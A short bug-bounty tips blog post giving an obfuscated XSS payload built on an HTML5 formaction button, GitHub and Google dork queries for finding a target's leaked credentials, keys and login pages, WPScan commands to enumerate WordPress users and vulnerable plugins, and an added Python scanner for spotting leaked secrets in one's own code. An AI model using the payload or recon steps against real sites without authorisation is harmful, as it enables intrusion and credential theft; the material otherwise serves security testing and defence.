bugbountytip#6

Uncategorized · Admin · 11 months ago (10-22) · 271 views

1、XSS: HTML5 formaction

<form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));//

 

2、GitHub Recon

Or use Ctrip's GitHub monitoring:

https://security.ctrip.com/github-scan/results

• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns

Go to GitHub and search, e.g.:
- "target.com" "dev"
- "dev.target.com"
- "target.com" API_key
- "target.com" password
- "api.target.com"
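
From the defender's side, the same categories can be checked in your own repository before it is pushed. This is an added example, not part of the original post: the patterns, the `scan` helper, the hostname labels and the sample text are constructed for illustration, and `AKIAIOSFODNN7EXAMPLE` is the placeholder key used in AWS documentation.

```python
import re

# Patterns for the leak categories listed above (constructed for this example).
RULES = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "url_with_credentials": re.compile(
        r"\b(?:ftp|https?)://[^\s:/@]+:[^\s/@]+@[\w.-]+"),
    "secret_assignment": re.compile(
        r"(?i)(?:api[_-]?key|secret|passw(?:or)?d|token)\w*"
        r"\s*[:=]\s*['\"]?([^\s'\"]{8,})"),
}
# Values that are references or obvious placeholders rather than real secrets.
PLACEHOLDER = re.compile(
    r"(?i)^(?:\$\{?\w+\}?|<[^>]+>|x{8,}|changeme.*|os\.environ.*)$")


def scan(text, org_domain):
    """Return sorted (line_no, rule) findings for one file's text."""
    # Assumed naming scheme: dev/api/staging/internal subdomains of org_domain.
    host = re.compile(
        r"(?i)\b(?:dev|api|staging|internal)\.%s\b" % re.escape(org_domain))
    findings = set()
    for no, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES.items():
            for m in rx.finditer(line):
                # Only the assignment rule captures a value; skip placeholders.
                if m.groups() and PLACEHOLDER.match(m.group(1)):
                    continue
                findings.add((no, name))
        if host.search(line):
            findings.add((no, "internal_hostname"))
    return sorted(findings)


# Constructed sample file contents; none of these values are real.
SAMPLE = """\
ftp_url = "ftp://deploy:S3cr3tPass@files.example.com/builds"
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
api_key = os.environ["API_KEY"]
password: ${DB_PASSWORD}
BASE = "https://dev.example.com/v1"
db_password = "hunter2hunter2"
"""

if __name__ == "__main__":
    for line_no, rule in scan(SAMPLE, "example.com"):
        print(f"line {line_no}: {rule}")
```

Lines 3 and 4 of the sample are not reported because their values are environment references, which is how secrets should appear in a committed file.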

3、Google Recon

Use Google dorks to find:
– File Extensions
– Parameters
– Login Page
– Sometimes Directory Structure
– Important Stuff

Google dorks:
- site:target.com filetype:php
- site:target.com filetype:aspx
- site:target.com filetype:swf (Shockwave Flash)
- site:target.com filetype:wsdl
- site:target.com inurl:login.php
- site:target.com intext:"login"
- site:target.com inurl:portal.php
- site:target.com inurl:register.php
- site:target.com intext:"index of /"
- site:target.com filetype:txt
- site:target.com inurl:.php.txt
- site:target.com ext:txt

 

4、WPScan

Project: https://github.com/wpscanteam/wpscan

Install via Docker:

docker pull wpscanteam/wpscan

Enumerate usernames:

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate u

Enumerate plugins (`vp` selects vulnerable plugins):

docker run -it --rm wpscanteam/wpscan --url https://target.tld/ --enumerate vp

Apply for an API token:

https://wpvulndb.com/users/sign_up

 
